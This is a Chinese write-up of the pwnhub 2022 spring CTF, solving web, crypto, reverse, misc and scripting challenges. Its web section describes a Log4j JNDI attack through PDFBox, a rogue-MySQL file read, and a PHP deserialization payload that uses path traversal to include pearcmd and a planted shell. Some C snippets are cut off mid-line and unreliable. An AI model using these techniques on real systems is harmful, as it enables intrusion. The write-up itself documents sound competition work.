
pwnhub2022春季赛 wp

pwnhub2022春季赛 wp

菜捏,本来还说努努力恰个钱,结果大家都是套皮究极联队。搞了两天经典纪念品,taxi了

几个人小作坊式的恰钱计划还是打不过联队捏。好烦哦
题目整体难度不是很大。但是那个传奇实在是有点技术盲区
最后除了null究极碾压全场之外,剩下几个队都只差一点点。多出一个题就恰饱饱了呜呜。据说null还去mrctf大杀四方,人多就是好啊呜呜

web

ezpdf

pdfbox+log4j2
jdk版本8u181随便打jndi
百度搜索可得,复制粘贴打通
https://github.com/eelyvy/log4jshell-pdf
按照说明把/size后面的数字改成payload,marshal开一个ldap refer server一键打通

第一天搜索能力有限想着自己找,用tabby之类的,结果tabby究极出bug,现在找原因。。

esay cms

mysql处rogue mysql读文件,读文件后发现testtool存在直接的反序列化点,反序列化的结果会直接带上()动态执行,故可以通过动态调用数组的方式来调用类方法,审计代码发现route类的getView方法可以通过改变route类的class值来实现任意php文件包含,而环境里存在pearcmd,故直接包含pearcmd写一个shell,再包含这个shell即可

<?php
class route
{
    # Minimal mirror of the target's `route` class: only the properties that
    # survive unserialize() and matter to route::getView are declared here.
    protected $toolVar = '123';

    protected $mode = 'index';
    # `class` is consumed by getView as a file path (see the writeup above);
    # the alternative values left commented out by the author show the same
    # traversal prefix. Defensively, getView should resolve `class` against an
    # allowlist of view names rather than a caller-controlled relative path.
    #protected $class = '../../../../../../../../../usr/local/lib/php/pearcmd';
    #protected $class = '../../../../../../../../../var/www/html/index';
    protected $class = '../../../../../../../../../tmp/shell';
}
# Serialize the [object, method] callable pair and URL-encode it for transport.
$callable = array(new route(), 'getView');
$serialized = serialize($callable);
echo urlencode($serialized);

rmb神仙用go写的rogue mysql好稳的捏

baby flask

显然的ssti点,但是由于缓存的存在即使复写模板也不会再次渲染。简单debug找到cache定义,LRUcache默认容量400
写个破烂一直访问create创建500个模板然后前面一百个任意ssti
复制粘贴一个payload打通

简单的说,web的题都挺水的。。。

然后我全知全能lgw秒杀接下来的绝大多数题目,由于汇总了wp就一起贴一下

re

letsgo

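# Encoded bytes pulled from the binary.
res = [0x07, 0x0A, 0x14, 0x55, 0x1C, 0x51, 0x57, 0x5C, 0x10, 0x02, 0x02, 0x4F, 0x51, 0x18,
       0x03, 0x04, 0x05, 0x4D, 0x1A, 0x19, 0x51, 0x4E, 0x53, 0x01, 0x09, 0x0D, 0x43, 0x00,
       0x4F, 0x52, 0x5A, 0x5C, 0x40, 0x02, 0x01, 0x4B, 0x52, 0x03, 0x4C, 0x1B, 0x52, 0x50]


def decode(buf):
    """Undo the binary's per-triple XOR shuffle and map each byte to text.

    For every full group of three bytes (a, b, c) the encoder's steps are
    reversed in place on a copy: c ^= b, then b ^= a ^ c, then a ^= c.
    Each resulting byte is turned into a character with chr(0x7f - byte).
    A trailing partial group (fewer than three bytes) is left unshuffled,
    which matches the original loop's stride-3 bound.

    Args:
        buf: iterable of byte values (0..0x7f expected).

    Returns:
        The decoded string; "" for empty input. The caller's list is not modified.
    """
    data = list(buf)
    for i in range(0, len(data) - 2, 3):
        data[i + 2] ^= data[i + 1]
        data[i + 1] ^= data[i] ^ data[i + 2]
        data[i] ^= data[i + 2]
    return "".join(chr(0x7F - b) for b in data)


flag = decode(res)
print(flag)
# flag{2d830225-d367-47c0-851b-b9ec765ba0f4}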

misc

眼神得好

import cv2
import numpy as np
from PIL import Image


# Compare every pixel with the one four columns to its left; any differing
# bit marks the pixel. Those marks form the output image.
src = cv2.imread('out.bmp')
shifted = src[:, 4:]
base = src[:, :-4]
mask = (shifted ^ base) > 0
# Only the first channel is written out.
Image.fromarray(mask[:, :, 0]).save('out1.bmp')
#flag{nice_pwnhub}

crypto

esrsa

from Crypto.Util.number import *

# Challenge values: (x, y) is a point on the hidden curve, n = p*q, e the public exponent.
x, y = (338555080220637081961629108201515088631648910827927160728143665306856840891283037339677849661861227903908933145477264046446986150577658634798201036502060805774599658207669111688439996110692201008037849119605962378316457201998475046620515963725786423440494993922281942396227626532022005579340476627086260000576524772862121364339849726687865874619472513654142054490221489754144358483093331358263771080584662872680106076787261957704707055652825959314984924849600101, 936859805496385391559236776246883920797971062581544240268575675825570737296851006237870839271568976317212531276234406232945021531066674291887782791534409966305833225084692612867437424551505174720475931132798839349207246806850341280754752239303350596733681932273450149927797735966407187594725231158980098119489003450563623494155562513634618466910170109518754662675054081897025489520391417883488720972781393802142478712026232107041683271177224983497203599032383279)
n = 988000511804778695813521569460767024014375863209856154754147082419975777208656083311740358048468580712106204105426217752071608551112269505247365548210006567296850568411531004204795967810292432041395592133501302461324005142940183488044983348152371980166614840414803124031222965874472013554869981954785271467321919039144942853506143787908194930700818770224752026306092706366253640515130802157497666497193713819097381223915943111321812676982912146706199692543488639
e = 0x10001

# The factor q is a small root of a linear polynomial over Z/nZ, so
# Coppersmith's method recovers it: beta=0.5 asks for a root modulo a
# divisor of n of size about n^0.5, X=2**512 bounds the root itself.
R.<t> = Zmod(n)[]
poly = (1 + 2*x)*t + (2*(x**3 - y**2) - 1)
q = int(poly.monic().small_roots(beta=0.5, X=2**512)[0])
p = n // q

# Rebuild the curve over GF(q) from p and q, then undo the scalar
# multiplication by e using the inverse of e modulo the group order.
E = EllipticCurve(GF(q), [p + q, p**2 + (q - 1)//2])
order = E.order()
d = inverse_mod(e, order)
M = E(x, y) * d
flag_x = int(M.xy()[0])
flag = long_to_bytes(flag_x)[:-20].decode()
print(flag)

rootrsa

直接在Zmod(n)上对c连续四次开方即可

ppc

baby line

#include
int main()
{
    int t,m,n,k,c;
    scanf("%d",&t);
    while(t--){
        scanf("%d%d%d",&m,&n,&k);
        int a[m];
        for(int i=0;i

hilbert

#include

/* Permutation tables for the Hilbert-curve recursion in f() below
 * (f is cut off in this excerpt). t2 is indexed with f()'s recursive
 * result; t2 is the inverse permutation of t1 (t1[t2[i]] == i for every i). */
int t1[7]={0,2,4,1,3,6,5};
int t2[7]={0,3,1,4,2,6,5};

int f(int n,int x,int y){
    //printf("%d %d %d\n",n,x,y);
    if(x==1&&y==1)return 0;
    if(x==(1<(1<<(n-1))&&y<=(1<<(n-1)))return t2[f(n-1,y,(1<

gaming

是兄弟就来砍我

创号登录公告区即可获取flag

初入门径

看到别人在打boss然后上去蹭拿到了flag之书01
描述即为flag

擂台决斗

不知道怎么搞捏,最后这个题看了一晚上没出,然后最后时刻就看大伙藏的flag掏出来大杀四方喜提纪念品了。无语捏
因为抓包没有抓到什么流量,感觉整个flash游戏基本上都是前端在操作,然后去研究swf,似乎逻辑都在这个里面,那么flag物品的描述应该也在这里面,然后就没有然后了,下了swf解包器对着swf文件一个个看,结果一无所获。钱钱离我而去

other

签到

扫二维码拿到flag

words check

import base64
import hashlib
import json
import os
import time
import urllib

import requests
from tencentcloud.common import credential
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException
from tencentcloud.ocr.v20181119 import ocr_client, models

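# Cloud API credentials are read from the environment instead of being
# committed in the script. Any key pair that was ever pasted into a published
# copy of this file should be treated as exposed and rotated in the console.
secret_id = os.environ.get("TENCENTCLOUD_SECRET_ID", "")
secret_key = os.environ.get("TENCENTCLOUD_SECRET_KEY", "")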
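def ocr(data):
    """Run Tencent Cloud general OCR on a base64-encoded image.

    Args:
        data: the image as a base64 string, as returned by the challenge's
            /getPic endpoint.

    Returns:
        The first detected text line, or "" when the service reports no
        text detections.
    """
    # Build the request body with json.dumps so the image string is escaped
    # properly instead of being spliced into a JSON literal by hand.
    params = json.dumps({"ImageBase64": data})
    cred = credential.Credential(secret_id, secret_key)
    http_profile = HttpProfile()
    http_profile.endpoint = "ocr.tencentcloudapi.com"

    client_profile = ClientProfile()
    client_profile.httpProfile = http_profile

    client = ocr_client.OcrClient(cred, "ap-guangzhou", client_profile)

    req = models.GeneralBasicOCRRequest()
    req.from_json_string(params)
    resp = client.GeneralBasicOCR(req)
    # An image with no recognisable text gives an empty TextDetections list;
    # return "" rather than raising IndexError so the caller's word check runs.
    if not resp.TextDetections:
        return ""
    return resp.TextDetections[0].DetectedText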

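url = 'http://47.97.127.1:26432'
token = requests.get(url + '/getToken').json()['data']['token']
words = requests.get(url + '/getViolWords').json()['data']['violWords']
# 50 rounds, as in the author's run.
for i in range(50):
    pic = requests.post(url + '/getPic', json={'token': token}).json()
    data = pic['data']['words']['w1']
    sentence = ocr(data)
    # The expected answer is True when the sentence contains none of the
    # violation words (the original spelled this as `any(...) == False`).
    is_clean = not any(word in sentence for word in words)
    verdict = requests.post(url + '/submits', json={'token': token, 'answer': is_clean}).json()
    print(i, verdict)
res = requests.post(url + '/getFlag', json={'token': token}).json()
print(res)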

medium black ocr

from PIL import Image,ImageDraw,ImageFont
import numpy as np
import pytesseract
import requests
import string
import base64
import io

FONT_SIZE = 30
TEXT_LENGTH = 10
# Canvas size as (width, height): about half a font-size per glyph plus a
# 20 px horizontal margin, and 8 px of vertical slack.
_fig_width = FONT_SIZE * TEXT_LENGTH // 2 + 20
_fig_height = FONT_SIZE + 8
FIG_SHAPE = (_fig_width, _fig_height)

def array2b64(np_array):
    """Return the ndarray's raw buffer base64-encoded (as bytes)."""
    return base64.b64encode(np_array.tobytes())

def b642array(bb64_buffer, reshape=(FIG_SHAPE[1], FIG_SHAPE[0])):
    """Decode a base64 float32 buffer into a uint8 image array.

    The floats are scaled by 255 and cast to uint8 (values outside [0, 1]
    are not checked), then reshaped to *reshape* as (rows, columns). Any
    failure while decoding or reshaping is printed and False is returned
    instead of raising.
    """
    try:
        raw = base64.b64decode(bb64_buffer)
        # frombuffer yields a read-only view, so copy before scaling in place.
        pixels = np.frombuffer(raw, dtype=np.float32).copy()
        pixels *= 255
        return pixels.astype(np.uint8).reshape(reshape)
    except Exception as e:
        print(e)
        print("No Hack ! BAD BUFFER")
        return False

def generate_fig(text_raw, font_size=FONT_SIZE):
    """Render *text_raw* in black on a white FIG_SHAPE canvas (mode "L").

    The drawing is saved to an in-memory PNG and reopened, so the returned
    object is a PIL image backed by that buffer rather than the drawing
    surface itself.
    """
    canvas = Image.new("L", FIG_SHAPE, 255)
    pen = ImageDraw.Draw(canvas)
    typeface = ImageFont.truetype("ubuntu.ttf", font_size)
    pen.text((0, 0), text_raw, font=typeface, fill="#000000")
    png = io.BytesIO()
    canvas.save(png, 'png')
    return Image.open(png)

def _predict(x):
    """Run tesseract over a uint8 image array and return the cleaned text.

    Returns "img format error" when the array does not form a FIG_SHAPE-sized
    8-bit greyscale image, and "" when tesseract raises.
    """
    img = Image.fromarray(x, mode='L')
    wrong_format = img.size != FIG_SHAPE or img.mode != 'L'
    if wrong_format:
        return "img format error"
    try:
        text = pytesseract.image_to_string(img, config=" tessedit_char_whitelist=abcdefghijklmnopqrstuvwxyz ")
    except Exception as e:
        print(e)
        return ""
    # Strip whitespace, then drop the newline and form-feed characters
    # that tesseract leaves in its output.
    return text.strip().replace("\n", "").replace("\x0c", "")

# One reference strip per lowercase letter: render the letter ten times and
# keep the first 15 columns (one character cell) as float32.
imgs = {
    c: np.array(generate_fig(c * 10), dtype=np.float32)[:, :15]
    for c in string.ascii_lowercase
}

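url = 'http://47.97.127.1:26857'
br = requests.Session()
CELL_WIDTH = 15                                       # columns kept per glyph in `imgs`
PAD_WIDTH = FIG_SHAPE[0] - TEXT_LENGTH * CELL_WIDTH   # white columns needed to reach full width
for k in range(100):
    res = br.get(url + '/start').text
    # The page states the original and target strings inside backticks.
    origin = res[res.find(' `') + 2:res.find('` ')]
    target = res[res.find('as `') + 4:res.find('`.')]
    # Compose the image cell by cell: unchanged positions use the origin
    # glyph, changed positions blend origin and target 50/50.
    cells = []
    for i in range(TEXT_LENGTH):
        if origin[i] == target[i]:
            cells.append(imgs[origin[i]])
        else:
            cells.append(imgs[origin[i]] * 0.5 + imgs[target[i]] * 0.5)
    cells.append(np.full((FIG_SHAPE[1], PAD_WIDTH), 255, dtype=np.float32))
    composite = np.hstack(cells)

    # Encoded once and reused for get_flag; the extra factor of 255 matches
    # the author's original submission (b642array rescales by 255 again).
    payload = array2b64(composite * 255)
    res = br.post(url + '/predict', {'b64_image': payload}).text
    print(k, origin, target, res)
    if res == target:
        print(br.post(url + '/get_flag', {'b64_image': payload}).text)
        break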